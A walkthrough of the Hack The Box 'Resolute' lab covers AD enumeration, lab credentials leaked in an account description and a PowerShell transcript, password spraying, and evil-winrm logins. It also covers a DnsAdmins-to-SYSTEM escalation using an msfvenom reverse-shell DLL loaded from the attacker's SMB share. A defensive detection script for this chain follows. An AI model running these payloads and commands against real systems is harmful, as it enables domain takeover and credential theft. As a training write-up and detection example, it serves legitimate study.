# HTB Resolute Walkthrough

Jun 2, 2020 | nanobyte

In this walkthrough, I will take you through the steps I performed to root this machine from the Hack The Box penetration testing labs. It is a Windows-based box rated medium difficulty. To begin, I started with my enumeration of the target machine: a full TCP port scan with service and OS detection, which took roughly ten minutes across all 65535 ports:

```
nmap -sV -sC -O -p- 10.10.10.169
Starting Nmap 7.80 ( https://nmap.org ) at 2019-12-12 08:19 CST
Nmap scan report for resolute.htb (10.10.10.169)
Host is up (0.035s latency).
Not shown: 65511 closed ports
PORT      STATE SERVICE      VERSION
53/tcp    open  domain?
88/tcp    open  kerberos-sec Microsoft Windows Kerberos (server time: 2019-12-12 14:34:56Z)
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
389/tcp   open  ldap         Microsoft Windows Active Directory LDAP (Domain: megabank.local, Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds (workgroup: MEGABANK)
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http   Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap         Microsoft Windows Active Directory LDAP (Domain: megabank.local, Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
5985/tcp  open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp  open  mc-nmf       .NET Message Framing
47001/tcp open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open  msrpc        Microsoft Windows RPC
49665/tcp open  msrpc        Microsoft Windows RPC
49666/tcp open  msrpc        Microsoft Windows RPC
49667/tcp open  msrpc        Microsoft Windows RPC
49671/tcp open  msrpc        Microsoft Windows RPC
49676/tcp open  ncacn_http   Microsoft Windows RPC over HTTP 1.0
49677/tcp open  msrpc        Microsoft Windows RPC
49688/tcp open  msrpc        Microsoft Windows RPC
49957/tcp open  msrpc        Microsoft Windows RPC
60579/tcp open  tcpwrapped
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.80%E=4%D=12/12%OT=53%CT=1%CU=40312%PV=Y%DS=2%DC=I%G=Y%TM=5DF24E
OS:E8%P=x86_64-pc-linux-gnu)SEQ(SP=101%GCD=2%ISR=109%CI=I%TS=A)SEQ(SP=101%G
OS:CD=1%ISR=109%CI=I%II=I%TS=A)OPS(O1=M54DNW8ST11%O2=M54DNW8ST11%O3=M54DNW8
OS:NNT11%O4=M54DNW8ST11%O5=M54DNW8ST11%O6=M54DST11)WIN(W1=2000%W2=2000%W3=2
OS:000%W4=2000%W5=2000%W6=2000)ECN(R=Y%DF=Y%T=80%W=2000%O=M54DNW8NNS%CC=Y%Q
OS:=)T1(R=Y%DF=Y%T=80%S=O%A=S+%F=AS%RD=0%Q=)T2(R=Y%DF=Y%T=80%W=0%S=Z%A=S%F=
OS:AR%O=%RD=0%Q=)T3(R=Y%DF=Y%T=80%W=0%S=Z%A=O%F=AR%O=%RD=0%Q=)T4(R=Y%DF=Y%T
OS:=80%W=0%S=A%A=O%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=80%W=0%S=Z%A=S+%F=AR%O=%RD=
OS:0%Q=)T6(R=Y%DF=Y%T=80%W=0%S=A%A=O%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=80%W=0%S=
OS:Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=80%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=
OS:G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=80%CD=Z)

Network Distance: 2 hops
Service Info: Host: RESOLUTE; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 2h47m40s, deviation: 4h37m09s, median: 7m39s
| smb-os-discovery:
|   OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
|   Computer name: Resolute
|   NetBIOS computer name: RESOLUTE\x00
|   Domain name: megabank.local
|   Forest name: megabank.local
|   FQDN: Resolute.megabank.local
|_  System time: 2019-12-12T06:36:03-08:00
| smb-security-mode:
|   account_used: <blank>
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: required
| smb2-security-mode:
|   2.02:
|_    Message signing enabled and required
| smb2-time:
|   date: 2019-12-12T14:36:02
|_  start_date: 2019-12-12T04:11:37

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 622.36 seconds
```

Kerberos (88), LDAP (389/3268) and the megabank.local domain name in the scan mark this as a domain controller, and port 5985 (WinRM) is a likely way in once credentials turn up. I also ran enum4linux, a wrapper around the Samba client tools (rpcclient, smbclient, net and nmblookup) that pulls users, groups, shares and password policy from Windows hosts over SMB and MS-RPC. Samba is the open-source implementation of the Server Message Block (SMB) protocol, which Windows uses for file and print sharing and for the RPC endpoints this enumeration relies on. I ran it with the `-a` option, which performs all of its simple enumeration checks against the target:

```
enum4linux -a 10.10.10.169
Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Sun Dec 29 12:15:48 2019

 ==========================
|    Target Information    |
 ==========================
Target ........... resolute.htb
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none

...

 =============================
|    Users on resolute.htb    |
 =============================
index: 0x10b0 RID: 0x19ca acb: 0x00000010 Account: abigail      Name: (null)    Desc: (null)
index: 0xfbc RID: 0x1f4 acb: 0x00000210 Account: Administrator  Name: (null)    Desc: Built-in account for administering the computer/dom>
index: 0x10b4 RID: 0x19ce acb: 0x00000010 Account: angela       Name: (null)    Desc: (null)
index: 0x10bc RID: 0x19d6 acb: 0x00000010 Account: annette      Name: (null)    Desc: (null)
index: 0x10bd RID: 0x19d7 acb: 0x00000010 Account: annika       Name: (null)    Desc: (null)
index: 0x10b9 RID: 0x19d3 acb: 0x00000010 Account: claire       Name: (null)    Desc: (null)
index: 0x10bf RID: 0x19d9 acb: 0x00000010 Account: claude       Name: (null)    Desc: (null)
index: 0xfbe RID: 0x1f7 acb: 0x00000215 Account: DefaultAccount Name: (null)    Desc: A user account managed by the system.
index: 0x10b5 RID: 0x19cf acb: 0x00000010 Account: felicia      Name: (null)    Desc: (null)
index: 0x10b3 RID: 0x19cd acb: 0x00000010 Account: fred Name: (null)    Desc: (null)
index: 0xfbd RID: 0x1f5 acb: 0x00000215 Account: Guest  Name: (null)    Desc: Built-in account for guest access to the computer/domain
index: 0x10b6 RID: 0x19d0 acb: 0x00000010 Account: gustavo      Name: (null)    Desc: (null)
index: 0xff4 RID: 0x1f6 acb: 0x00000011 Account: krbtgt Name: (null)    Desc: Key Distribution Center Service Account
index: 0x10b1 RID: 0x19cb acb: 0x00000010 Account: marcus       Name: (null)    Desc: (null)
index: 0x10a9 RID: 0x457 acb: 0x00000210 Account: marko Name: Marko Novak       Desc: Account created. Password set to Welcome123!
index: 0x10c0 RID: 0x2775 acb: 0x00000010 Account: melanie      Name: (null)    Desc: (null)
index: 0x10c3 RID: 0x2778 acb: 0x00000010 Account: naoki        Name: (null)    Desc: (null)
index: 0x10ba RID: 0x19d4 acb: 0x00000010 Account: paulo        Name: (null)    Desc: (null)
index: 0x10be RID: 0x19d8 acb: 0x00000010 Account: per  Name: (null)    Desc: (null)
index: 0x10a3 RID: 0x451 acb: 0x00000210 Account: ryan  Name: Ryan Bertrand     Desc: (null)
index: 0x10b2 RID: 0x19cc acb: 0x00000010 Account: sally        Name: (null)    Desc: (null)
index: 0x10c2 RID: 0x2777 acb: 0x00000010 Account: simon        Name: (null)    Desc: (null)
index: 0x10bb RID: 0x19d5 acb: 0x00000010 Account: steve        Name: (null)    Desc: (null)
index: 0x10b8 RID: 0x19d2 acb: 0x00000010 Account: stevie       Name: (null)    Desc: (null)
index: 0x10af RID: 0x19c9 acb: 0x00000010 Account: sunita       Name: (null)    Desc: (null)
index: 0x10b7 RID: 0x19d1 acb: 0x00000010 Account: ulf  Name: (null)    Desc: (null)
index: 0x10c1 RID: 0x2776 acb: 0x00000010 Account: zach Name: (null)    Desc: (null)
...
```

I trimmed the rest of the output, since there was a ton of it, but left the complete list of users found on the box. Looking over these results, I spotted a set of credentials sitting in an account description: marko:Welcome123! (the exclamation point is part of the password, so quote it if your shell treats `!` specially). Now that I had credentials, I began looking for where I could use them. One of my first go-to tools is [evil-winrm](https://github.com/Hackplayers/evil-winrm), a WinRM (Windows Remote Management) shell built for penetration testing; WinRM is the HTTP service the scan showed on port 5985. It has a ton of features and should be ready for use, especially with Hack The Box. I attempted to log in to Resolute with these credentials:

```
evil-winrm -i 10.10.10.169 -p Welcome123! -u marko
```

And it failed! However, new accounts are often created with a standard default password, and that default is rarely changed promptly, so the same password is worth trying against every user the enumeration turned up. Before spraying a domain, check the lockout policy (threshold and observation window): one password against all users stays under any threshold of two or more attempts, but repeated rounds can lock out the whole user list. Spraying Welcome123! across the accounts from the enum4linux output, I found that it worked for melanie:

```
evil-winrm -i 10.10.10.169 -p Welcome123! -u melanie
```

Awesome! I was now able to log into the machine, and I began enumerating the box manually. In the root of `C:\` there was a PSTranscripts directory (when hunting like this, list hidden items as well so directories like this are not missed). PowerShell transcription records every command a user ran, including any credentials passed inline on the command line, and reading through this transcript turned up another set of credentials:

```
cat C:\PSTranscripts\20191203\PowerShell_transcript.RESOLUTE.OJuoBGhU.20191203063201.txt
...
PS>CommandInvocation(Invoke-Expression): "Invoke-Expression"
>> ParameterBinding(Invoke-Expression): name="Command"; value="cmd /c net use X: \\fs01\backups ryan Serv3r4Admin4cc123!
...
```

These credentials, ryan:Serv3r4Admin4cc123!, had been used to map a share on fs01, but a domain password is a domain password, so I opened a new terminal window and used Evil-WinRM to log in to Resolute as ryan:

```
evil-winrm -i 10.10.10.169 -p Serv3r4Admin4cc123! -u ryan
```

Again, I began to enumerate the machine manually. I started by checking what rights I had as this user, and a simple `whoami /all` showed that I was a member of a very interesting group:

```
*Evil-WinRM* PS C:\Users\ryan\Documents> whoami /all
...
MEGABANK\DnsAdmins                         Alias            S-1-5-21-1392959593-3013219662-3596683436-1101 Mandatory group, Enabled by default, Enabled group, Local Group
...
```

I was logged in as a member of DnsAdmins! Some Google-Fu led me to this [Medium](https://medium.com/@esnesenon/feature-not-bug-dnsadmin-to-dc-compromise-in-one-line-a0f779b8dc83) article on escalating from DnsAdmins to domain controller compromise. The idea: members of DnsAdmins are allowed to configure the DNS server through dnscmd.exe, including its ServerLevelPluginDll setting, and the DNS service (dns.exe) runs as SYSTEM on the domain controller and loads whatever DLL that setting names, even from a UNC path, the next time it starts. First, on my Kali machine, I used msfvenom to create a malicious DLL for the DNS service to load. The payload has to be a stageless one (`shell_reverse_tcp`) because I am catching it with a plain nc listener; the staged `shell/reverse_tcp` variant only connects back and then waits for a Metasploit handler to deliver its second stage:

```
msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.14.13 LPORT=9001 -f dll > shell.dll
```

I then used Impacket's smbserver to host the newly created DLL so Resolute could load it over SMB. [Impacket](https://github.com/SecureAuthCorp/impacket) is another tool that gets used constantly on Hack The Box and should be on your Kali machine: a set of Python classes for working with network protocols, and a great toolkit to learn for penetration testing. Kali packages the example scripts as `impacket-*` commands; straight from the Impacket examples directory the same script is smbserver.py. This serves my Resolute working directory as an anonymous share named test (if the server refuses to connect to a plain SMB1 share, add the `-smb2support` flag):

```
impacket-smbserver test /root/Desktop/HTB/Resolute/
```

Now that the DLL was hosted over SMB, I set up my listener on my Kali box before triggering anything, on the port baked into the payload:

```
nc -nlvp 9001
```

I then used dnscmd.exe on Resolute to point the DNS server's plugin setting at my share. Under the hood this writes the ServerLevelPluginDll value under the DNS service's Parameters key in the registry; nothing is loaded until the service restarts:

```
*Evil-WinRM* PS C:\Windows> dnscmd.exe /config /serverlevelplugindll \\10.10.14.13\\test\\shell.dll
```

All that remained was to restart the DNS service so that dns.exe, running as SYSTEM, loaded the DLL. DnsAdmins membership alone does not grant the right to stop and start the service, so this step relies on ryan also having that right on this box:

```
*Evil-WinRM* PS C:\Windows> sc.exe stop dns
*Evil-WinRM* PS C:\Windows> sc.exe start dns
```

And I got a callback on my nc listener as SYSTEM:

```
C:\Windows\system32>whoami
whoami
nt authority\system

C:\Windows\system32>cd c:\users\administrator\desktop
cd c:\users\administrator\desktop

c:\Users\Administrator\Desktop>more root.txt
e1d94876a50685xxxxxxxxxxxxxx
```
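The whole chain above leaves a short, distinctive trail on the domain controller: a dnscmd.exe invocation carrying /serverlevelplugindll, a write to the ServerLevelPluginDll value under the DNS service's Parameters key, and a stop/start of the DNS service by an ordinary user account. As an added example that is not part of the original walkthrough, the following Python script runs those three checks over a stream of process-creation and registry-set events in the style of Sysmon event IDs 1 and 13, and escalates the service restart only when the same user has already pointed the plugin value at a DLL. The events embedded in it are constructed to mirror the commands run on Resolute, not real logs; the field names, rule names and severity scheme are my own assumptions.

```python
import re

# Registry value that "dnscmd /config /serverlevelplugindll" writes; dns.exe loads it as SYSTEM on start.
PLUGIN_VALUE = r"HKLM\SYSTEM\CurrentControlSet\Services\DNS\Parameters\ServerLevelPluginDll"

PLUGIN_CMD = re.compile(r"/serverlevelplugindll\s*(\S*)", re.IGNORECASE)   # group 1: DLL path ("" clears it)
DNS_RESTART = re.compile(r"\b(?:sc|net)(?:\.exe)?\s+(?:stop|start)\s+dns\b", re.IGNORECASE)
UNC_PATH = re.compile(r"^\\\\[^\\]+\\")                                    # \\host\share\...

# Constructed events modelled on Sysmon process-create (id 1) and registry-set (id 13)
# records. They mirror the commands run on Resolute but are not real logs from it.
EVENTS = [
    {"id": 1, "user": r"MEGABANK\ryan", "image": r"C:\Windows\System32\dnscmd.exe",
     "cmd": r"dnscmd.exe /config /serverlevelplugindll \\10.10.14.13\test\shell.dll"},
    {"id": 13, "user": r"NT AUTHORITY\SYSTEM", "image": r"C:\Windows\System32\dns.exe",
     "target": PLUGIN_VALUE, "details": r"\\10.10.14.13\test\shell.dll"},
    {"id": 1, "user": r"MEGABANK\ryan", "image": r"C:\Windows\System32\sc.exe", "cmd": "sc.exe stop dns"},
    {"id": 1, "user": r"MEGABANK\ryan", "image": r"C:\Windows\System32\sc.exe", "cmd": "sc.exe start dns"},
    # Routine DNS administration: same binary, same group, no alert.
    {"id": 1, "user": r"MEGABANK\dnsops", "image": r"C:\Windows\System32\dnscmd.exe",
     "cmd": "dnscmd.exe /zoneadd corp.megabank.local /primary"},
]


def dll_severity(dll):
    """Rate a ServerLevelPluginDll value: unset is the remediation, a UNC path is the attack."""
    if not dll:
        return "info"
    return "critical" if UNC_PATH.match(dll) else "high"


def analyze(events):
    """Walk the events in order and return a list of findings."""
    findings = []
    armed = set()   # users who have pointed the plugin value at a DLL earlier in the stream
    for ev in events:
        user = ev.get("user", "")
        if ev["id"] == 1:
            cmd = ev.get("cmd", "")
            m = PLUGIN_CMD.search(cmd)
            if ev.get("image", "").lower().endswith("dnscmd.exe") and m:
                dll = m.group(1)
                findings.append({"rule": "dnscmd-serverlevelplugindll", "severity": dll_severity(dll),
                                 "user": user, "dll": dll})
                if dll:
                    armed.add(user.lower())
            elif DNS_RESTART.search(cmd):
                # A restart is what actually loads the DLL, so it is only high when this user armed it.
                sev = "high" if user.lower() in armed else "low"
                findings.append({"rule": "dns-service-restart", "severity": sev, "user": user, "cmd": cmd})
        elif ev["id"] == 13 and ev.get("target", "").lower() == PLUGIN_VALUE.lower():
            dll = ev.get("details", "")
            findings.append({"rule": "registry-serverlevelplugindll", "severity": dll_severity(dll),
                             "user": user, "dll": dll})
    return findings


if __name__ == "__main__":
    for f in analyze(EVENTS):
        print(f"[{f['severity']:<8}] {f['rule']:<32} {f['user']:<22} {f.get('dll', f.get('cmd', ''))}")
```

A UNC path in the value is rated critical because a legitimate plugin would be a local, administrator-deployed file, and an empty value is rated info because clearing it is the remediation. On a live server the current value can be read with Get-ItemProperty against the HKLM:\SYSTEM\CurrentControlSet\Services\DNS\Parameters key; by default it is not set at all.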

And with that, I had rooted Resolute! Good luck.

